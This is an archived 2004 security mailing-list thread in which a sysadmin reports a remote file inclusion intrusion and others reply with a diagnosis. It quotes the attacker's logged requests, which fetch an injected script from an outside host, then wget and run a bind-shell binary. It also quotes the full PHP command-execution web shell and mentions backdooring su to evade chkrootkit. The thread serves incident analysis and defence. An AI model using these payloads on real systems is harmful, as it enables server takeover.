Re: Hack attempt
mike_at_genxweb.net
Date: 07/23/04
- Previous message: Kevin Johnson: "Re: Hack attempt"
- In reply to: Kevin Johnson: "Re: Hack attempt"
- Next in thread: Simon Allard: "RE: Hack attempt"
- Reply: Simon Allard: "RE: Hack attempt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 Jul 2004 13:28:19 -0400 To: Kevin Johnson <kjohnson@secureideas.net>
Correct me if I am wrong doesnt chkrootkit only check system files for kits.
Loos like he just downloaded normal tools not having any back doors in them. A
eggdrop it self it is not considered a trojan unless it is not wanted. But how
does chkrootkit know if it is wanted or not.
I also would not rely on chkrootkit. I ran a root war once where i downloaded
the gunu source for the su command backdoored it with a second arg and
installed it using touch to change the date. chkrootkit did not detect this
change.
Quoting Kevin Johnson <kjohnson@secureideas.net>:
> Hi-
>
> It appears that the file <some script>.php is vulnerable to a file
> injection. Basically what that means is that is accepts what ever value
> someone put into the bodyfile variable and inserts its code before
> parsing the script. This allows the attacker to run what ever code as
> the user that your web server runs as. You will need to fix the code to
> not allow inserting remote files.
>
> If you need anymore information, feel free to reply and I will try to
> help.
>
> Kevin Johnson
>
>
> On Wed, 2004-07-21 at 11:02, Norbert Crettol wrote:
> > Hi all.
> >
> > This is my first post here. I'm Norbert Crettol, one of the sysadmins
> > of Idiap, a research center in Switzerland (www.idiap.ch).
> >
> > We've had a undesired visitor, last night, that I discovered in the
> > reports of tripwire.
> >
> > Here are the logs we got (we get a remote copy of the web server logs
> > in another host). As of the second line, I've stripped the head and
> > the tail of the line which is allways the same.
> > --- begin ---
> > "GET /<some
> script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0"
> 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> >
>
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> >
>
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> >
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> > --- end ---
> > I've seen no other
> >
> > It looks like bind8080 has created a directory /var/lock/.tmp
> > and expanded an (owned by the web server owner) archive there. Here
> > is the list of the files :
> > 3225 jui 20 03:53 c-leet
> > 15 jui 20 03:47 c-leet.dir
> > 51 jui 20 03:47 cron.d
> > 512 mai 12 2002 doc/
> > 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> > 2523568 mai 12 2002 eggdrop-1.6.10*
> > 512 mai 12 2002 filesys/
> > 343 fév 11 03:55 ****
> > 512 mai 12 2002 help/
> > 21149 nov 4 2003 kik*
> > 1024 jui 21 11:00 language/
> > 512 mai 12 2002 logs/
> > 6 jui 20 03:48 pid.CaEm-
> > 23065 jan 29 15:00 proc*
> > 6 jui 20 03:48 psybnc.pid
> > 28591 mai 12 2002 README
> > 89 jui 20 03:53 run*
> > 588 avr 1 10:00 run-*
> > 708 avr 1 10:00 run--*
> > 512 mar 31 08:12 scripts/
> > 512 mai 12 2002 text/
> > 2523568 mar 28 01:41 vi*
> > 30293 nov 17 2002 xhide*
> > 182 jui 20 03:47 y2kupdate*
> >
> > Here is the content of http://www.bosscalvin.com/inject.txt :
> > --- begin ---
> > <font color="red">
> > <br><font face="Comic Sans MS" size="2"><center>
> > <b>CMD</b> - System Command<br><br></center></font><font face="Verdana"
> size="1"></center><br>
> > <b>#</b> CMD PHP : <br>
> > <b>#</b> Released by : <b>SecurityCorp</b><br>
> > <b>#</b> Edited by CaEm
> > <br>
> > <br>
> > <hr color="red" width=751px height=115px>
> > <br>
> > <pre><font face="Verdana" size="1">
> > <?
> > // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> > if (isset($chdir)) @chdir($chdir);
> > ob_start();
> > system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> > $output = ob_get_contents();
> > ob_end_clean();
> > if (!empty($output)) echo str_replace(">", ">", str_replace("<",
> "<", $output));
> > ?>
> > </font></pre>
> > <br>
> > <hr color="red" width=751px height=115px>
> > <br>
> > <font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b>
> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
> > --- end ---
> >
> > Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
> > Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> > Is there a way to stop this guy ? His nickname (CaEm) appears in the
> > the uploaded scripts.
> >
> > Norbert
> >
>
>
- Previous message: Kevin Johnson: "Re: Hack attempt"
- In reply to: Kevin Johnson: "Re: Hack attempt"
- Next in thread: Simon Allard: "RE: Hack attempt"
- Reply: Simon Allard: "RE: Hack attempt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
